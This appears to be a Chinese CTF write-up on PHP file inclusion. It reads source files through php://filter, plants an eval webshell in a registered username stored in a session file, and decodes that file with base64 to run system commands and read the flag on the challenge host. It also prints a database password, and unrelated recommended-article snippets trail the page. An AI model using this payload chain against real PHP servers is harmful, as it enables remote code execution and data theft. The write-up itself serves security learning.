PHP文件包含 Session

首先了解一下PHP文件包含漏洞----包含session

利用条件:session文件路径已知,且其中内容部分可控。

姿势:

php的session文件的保存路径可以在phpinfo的session.save_path看到。

常见的php-session存放位置:

  1. /var/lib/php/sess_PHPSESSID
  2. /var/lib/php/sess_PHPSESSID
  3. /tmp/sess_PHPSESSID
  4. /tmp/sessions/sess_PHPSESSID

session 的文件名格式为 sess_[phpsessid]。而 phpsessid 在发送的请求的 cookie 字段中可以看到。

要包含并利用的话,需要能控制部分sesssion文件的内容。暂时没有通用的办法。有些时候,可以先包含进session文件,观察里面的内容,然后根据里面的字段来发现可控的变量,从而利用变量来写入payload,并之后再次包含从而执行php代码。

题目:

http://54.222.188.152:22589/

解题思路:

php伪协议读取源码

点击login,发现链接变为:

http://54.222.188.152:22589/index.php

?action=login.php

首先读取 login.php 的源码

http://54.222.188.152:22589/index.php

?action=php://filter/read=convert.base64-encode/resource=login.php

得到login.php源码:

<?php

    require_once('config.php');

    session_start();

    if($_SESSION['username']) {

        header('Location: index.php');

        exit;

    }

    if($_POST['username'] && $_POST['password']) {

        $username = $_POST['username'];

        $password = md5($_POST['password']);

        $mysqli = @new mysqli($dbhost, $dbuser, $dbpass, $dbname);

        if ($mysqli->connect_errno) {

            die("could not connect to the database:\n" . $mysqli->connect_error);

        }

        $sql = "select password from user where username=?";

        $stmt = $mysqli->prepare($sql);

        $stmt->bind_param("s", $username);

        $stmt->bind_result($res_password);

        $stmt->execute();

        $stmt->fetch();

        if ($res_password == $password) {

            $_SESSION['username'] = base64_encode($username);

            header("location:index.php");

        } else {

            die("Invalid user name or password");

        }

        $stmt->close();

        $mysqli->close();

    }

    else {

?>

<!DOCTYPE html>

<html>

<head>

   <title>Login</title>

   <link href="static/bootstrap.min.css" rel="stylesheet">

   <script src="static/jquery.min.js"></script>

   <script src="static/bootstrap.min.js"></script>

</head>

<body>

    <div class="container" style="margin-top:100px">

        <form action="login.php" method="post" class="well" style="width:220px;margin:0px auto;">

            <h3>Login</h3>

            <label>Username:</label>

            <input type="text" name="username" style="height:30px"class="span3"/>

            <label>Password:</label>

            <input type="password" name="password" style="height:30px" class="span3">

            <button type="submit" class="btn btn-primary">LOGIN</button>

        </form>

    </div>

</body>

</html>

<?php

    }

?>

读取 register.php 的源码

访问:

http://54.222.188.152:22589/index.php

?action=php://filter/read=convert.base64-encode/resource=register.php

得到源码:

<?php

if ($_POST['username'] && $_POST['password']) {

    require_once('config.php');

    $username = $_POST['username'];

    $password = md5($_POST['password']);

    $mysqli = @new mysqli($dbhost, $dbuser, $dbpass, $dbname);

    if ($mysqli->connect_errno) {

        die("could not connect to the database:\n" . $mysqli->connect_error);

    }

    $mysqli->set_charset("utf8");

    $sql = "select * from user where username=?";

    $stmt = $mysqli->prepare($sql);

    $stmt->bind_param("s", $username);

    $stmt->bind_result($res_id, $res_username, $res_password);

    $stmt->execute();

    $stmt->store_result();

    $count = $stmt->num_rows();

    if($count) {

        die('User name Already Exists');

    } else {

        $sql = "insert into user(username, password) values(?,?)";

        $stmt = $mysqli->prepare($sql);

        $stmt->bind_param("ss", $username, $password);

        $stmt->execute();

        echo 'Register OK!<a href="index.php">Please Login</a>';

    }

    $stmt->close();

    $mysqli->close();

} else {

?>

<!DOCTYPE html>

<html>

<head>

   <title>Login</title>

   <link href="static/bootstrap.min.css" rel="stylesheet">

   <script src="static/jquery.min.js"></script>

   <script src="static/bootstrap.min.js"></script>

</head>

<body>

    <div class="container" style="margin-top:100px">

        <form action="register.php" method="post" class="well" style="width:220px;margin:0px auto;">

            <h3>Register</h3>

            <label>Username:</label>

            <input type="text" name="username" style="height:30px"class="span3"/>

            <label>Password:</label>

            <input type="password" name="password" style="height:30px" class="span3">

            <button type="submit" class="btn btn-primary">REGISTER</button>

        </form>

    </div>

</body>

</html>

<?php

    }

?>

读取 config.php 的源码

http://54.222.188.152:22589/index.php

?action=php://filter/read=convert.base64-encode/resource=config.php

得到源码:

<?php

$dbhost = 'localhost';

$dbuser = 'web';

$dbpass = 'webpass123';

$dbname = 'web';

?>

读取 index.php 的源码

http://54.222.188.152:22589/index.php

?action=php://filter/read=convert.base64-encode/resource=index.php

源码:

<?php

error_reporting(0);

session_start();

if (isset($_GET['action'])) {

    include $_GET['action'];

    exit();

} else {

?>

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="utf-8">

    <title>Login</title>

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link href="css/bootstrap.css" rel="stylesheet" media="screen">

    <link href="css/main.css" rel="stylesheet" media="screen">

</head>

<body>

<div class="container">

    <div class="form-signin">

        <?php if (isset($_SESSION['username'])) { ?>

            <?php echo "<div class=\"alert alert-success\">You have been <strong>successfully logged in</strong>.</div>

<a href=\"index.php?action=logout.php\" class=\"btn btn-default btn-lg btn-block\">Logout</a>";}else{ ?>

            <?php echo "<div class=\"alert alert-warning\">Please Login.</div>

<a href=\"index.php?action=login.php\" class=\"btn btn-default btn-lg btn-block\">Login</a>

<a href=\"index.php?action=register.php\" class=\"btn btn-default btn-lg btn-block\">Register</a>";

        } ?>

    </div>

</div>

</body>

</html>

<?php

}

?>

解题分析:

拿到了源码,首先进行简单的审计一下。

SQL注入?:

有登陆页面,不知道会不会有注入,简单看一下。

往往注册与登陆操作中会有与数据库交互的地方,这也是sql注入的常见引发点。

看一下register.php,这里仅截取部分代码:

# register.php

$mysqli->set_charset("utf8");

$sql = "select * from user where username=?";

$stmt = $mysqli->prepare($sql);

$stmt->bind_param("s", $username);

$stmt->bind_result($res_id, $res_username, $res_password);

$stmt->execute();

$stmt->store_result();

再看一下login.php:

# login.php

$sql = "select password from user where username=?";

$stmt = $mysqli->prepare($sql);

$stmt->bind_param("s", $username);

$stmt->bind_result($res_password);

$stmt->execute();

$stmt->fetch();

这里都使用了PHP的PDO处理,因此这里存在sql注入的可能性很小。

session

接着再看看,有哪些参数是可控的。

在login.php中:

# 第3行

session_start();

if($_SESSION['username']) {

    header('Location: index.php');

    exit;

}

# 第8行

if($_POST['username'] && $_POST['password']) {

    $username = $_POST['username'];

# 第20行

    $stmt->bind_result($res_password);

# 第24行

    if ($res_password == $password) {

        $_SESSION['username'] = base64_encode($username);

        header("location:index.php");

这里使用了session来保存用户会话,php手册中是这样描述的:

  1. PHP 会将会话中的数据设置到 $_SESSION 变量中。
  2. 当 PHP 停止的时候,它会自动读取 $_SESSION 中的内容,并将其进行序列化,然后发送给会话保存管理器来进行保存。
  3. 对于文件会话保存管理器,会将会话数据保存到配置项 session.save_path 所指定的位置。

考虑到变量$username是我们可控的,并且被设置到了$_SESSION中,因此我们输入的数据未经过滤的就被写入到了对应的sessioin文件中。结合前面的php文件包含,可以推测这里可以包含session文件。

要包含session文件,需要知道文件的路径。先注册一个用户,比如chybeta。等登陆成功后。记录下cookie中的PHPSESSID的值,这里为udu8pr09fjvabtoip8icgurt85

访问:

http://54.222.188.152:22589/index.php?action=/var/lib/php5/sess_udu8pr09fjvabtoip8icgurt85

这个/var/lib/php5/的session文件路径是测试出来的,常见的也就是上面所述的几种。

base64_encode

能包含,并且控制session文件,但要写入可用的payload,还需要绕过:

$_SESSION['username'] = base64_encode($username);

如前面所示,输入的用户名会被base64加密。如果直接用php伪协议来解密整个session文件,由于序列化的前缀,势必导致乱码。

考虑一下base64的编码过程。比如编码abc。

未编码: abc

转成ascii码: 97 98 99

转成对应二进制(三组,每组8位): 01100001 01100010 01100011

重分组(四组,每组6位): 011000 010110 001001 100011

每组高位补零,变为每组8位:00011000 00010110 00001001 00100011

每组对应转为十进制: 24 22 9 35

查表得: Y W J j

考虑一下session的前缀:username|s:12:",中间的数字12表示后面base64串的长度。当base64串的长度小于100时,前缀的长度固定为15个字符,当base64串的长度大于100小于1000时,前缀的长度固定为16个字符。

由于16个字符,恰好满足一下条件:

16个字符 => 16 * 6 = 96 位 => 96 mod 8 = 0

也就是说,当对session文件进行base64解密时,前16个字符固然被解密为乱码,但不会再影响从第17个字符后的部分也就是base64加密后的username。

Getflag

注册一个账号,比如:

chybetachybetachybetachybetachybetachybetachybetachybetachybeta<?php eval($_GET['atebyhc']) ?>

其base64加密后的长度为128,大于100。

http://54.222.188.152:22589/index.php

?action=php://filter/read=convert.base64-decode/resource=/var/lib/php5/sess_udu8pr09fjvabtoip8icgurt85

&atebyhc=phpinfo();


成功getshell。

访问:

http://54.222.188.152:22589/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php5/sess_udu8pr09fjvabtoip8icgurt85&atebyhc=system('ls /');

访问:

http://54.222.188.152:22589/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php5/sess_udu8pr09fjvabtoip8icgurt85&atebyhc=system('cat /fffflllllaaaagggg.txt');

小结

考了几个知识点:

  1. php文件包含:伪协议利用
  2. php文件包含:包含session文件
  3. php-session知识及序列化格式
  4. base64的基本原理

原文链接(https://chybeta.github.io/2017/11/09/%E4%B8%80%E9%81%93CTF%E9%A2%98%EF%BC%9APHP%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/)

任重而道远!

CTF PHP文件包含--session的更多相关文章

  1. 实战经验丨CTF中文件包含的技巧总结

    站在巨人的肩头才会看见更远的世界,这是一篇技术牛人对CTF比赛中文件包含的内容总结,主要是对一些包含点的原理和特征进行归纳分析,并结合实际的例子来讲解如何绕过,全面细致,通俗易懂,掌握这个新技能定会让 ...

  2. CTF中文件包含的一些技巧

    i春秋作家:lem0n 原文来自:浅谈内存取证 0x00 前言 网络攻击内存化和网络犯罪隐遁化,使部分关键数字证据只存在于物理内存或暂存于页面交换文件中,这使得传统的基于文件系统的计算机取证不能有效应 ...

  3. CTF之文件包含的猥琐思路

    From: i春秋 百度杯”CTF 一: <?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello' ...

  4. CTF 文件包含与伪协议

    正巧在写代码审计的文章,无意间看到了一篇CTF的代码审计,CTF题目很好,用的姿势正如标题,文件包含和伪协议. 先放出原文链接(http://www.freebuf.com/column/150028 ...

  5. “百度杯”CTF比赛 十二月场_blog(kindeditor编辑器遍历,insert注入,文件包含)

    题目在i春秋的ctf训练营中能找到 首先先是一个用户登录与注册界面,一般有注册界面的都是要先让你注册一波,然后找惊喜的 那我就顺着他的意思去注册一个号 注册了一个123用户登录进来看到有个文本编辑器, ...

  6. CTF 文件包含

    目录 一.基本概念 二.本地文件包含 三.远程文件包含 四.具体场景 五.补充 一.基本概念 文件包含 将相同函数写入单独的文件中,需要使用时直接调用 文件包含漏洞 将被包含的文件设置为变量,导致客户 ...

  7. 一道内部ctf文件包含题

    拿到题目 在burp里看下 拿到源码 很明显是一道文件包含题目,包含cookie里的值,于是构造Cookie:language=chinese试试   文件变成中文的了,说明中文语言进行了包含并替换 ...

  8. 百度杯”CTF比赛 2017 二月场 没错!就是文件包含漏洞。

    题目源码: 文件包含漏洞的话,看一下 你么可以使用php://input 伪协议,执行代码(参考了大佬WP)这里使用了POSTMAN, 目录下还有一个dle345aae.php文件,呢么用cat命令打 ...

  9. 【CTF WEB】文件包含

    文件包含 题目要求: 请找到题目中FLAG 漏洞源码 <meta charset='utf-8'> <center><h1>文件阅读器</h1>< ...

随机推荐

  1. centos7上部署vnc服务器并实现远程桌面

    centos7上进行一下操作 [root@localhost ~]# yum install tigervnc-server -y#安装vnc服务器 Loaded plugins: fastestmi ...

  2. 打印流-PrintStream和PrintWriter

    概念: 打印流是输出信息最方便的类,注意包含PrintStream(字节打印流)和 PrintWriter(字符打印流).打印流提供了非常方便的打印功能,可以打印任何类型的数据信息,例如:小数,整数, ...

  3. Atheros AR9285坑爹网卡仅仅有54M/65M,开启150M速率的方法

    版权声明:Max Sky 原创文章.转载时请保留全部权并以超链接形式标明文章出处.否则将追究相关法律责任. https://blog.csdn.net/maxsky/article/details/3 ...

  4. 深入详解美团点评CAT跨语言服务监控(一) CAT简介与部署

    前言: CAT是一个实时和接近全量的监控系统,它侧重于对Java应用的监控,除了与点评RPC组件融合的很好之外,他将会能与Spring.MyBatis.Dubbo 等框架以及Log4j 等结合,支持P ...

  5. 备忘录模式-Memento Pattern

    1.主要优点 备忘录模式的主要优点如下: (1)它提供了一种状态恢复的实现机制,使得用户可以方便地回到一个特定的历史步骤,当新的状态无效或者存在问题时,可以使用暂时存储起来的备忘录将状态复原. (2) ...

  6. matlab:Source Control Integration

    http://cn.mathworks.com/help/matlab/source-control.html

  7. 脱壳:OEP(即程序入口点)查找 --- 基本思路和常见方法

    OEP:程序的入口点,软件加壳就是隐藏了OEP(或者用了假的OEP), 只要我们找到程序真正的OEP,就可以立刻脱壳. PUSHAD (压栈) 代表程序的入口点, POPAD (出栈) 代表程序的出口 ...

  8. Spring Cloud(Dalston.SR5)--Eureka 服务消费

    服务被注册.发布到 Eureka 服务器后,需要有程序去发现他,并且进行调用,称为服务消费,一个服务可能会部署多个实例,调用过程可能涉及负载均衡.服务器查找等问题,这些问题 Netflix 项目已经帮 ...

  9. mariadb开机自启

    执行命令:systemctl enable mariadb 并由此想到,添加服务自启的命令格式: systemctl enable 服务名 当然关闭服务自启也是可以得: systemctl disab ...

  10. Java多线程编程——并发编程原理(分布式环境中并发问题)

    在分布式环境中,处理并发问题就没办法通过操作系统和JVM的工具来解决,那么在分布式环境中,可以采取一下策略和方式来处理: 避免并发 时间戳 串行化 数据库 行锁 统一触发途径 避免并发 在分布式环境中 ...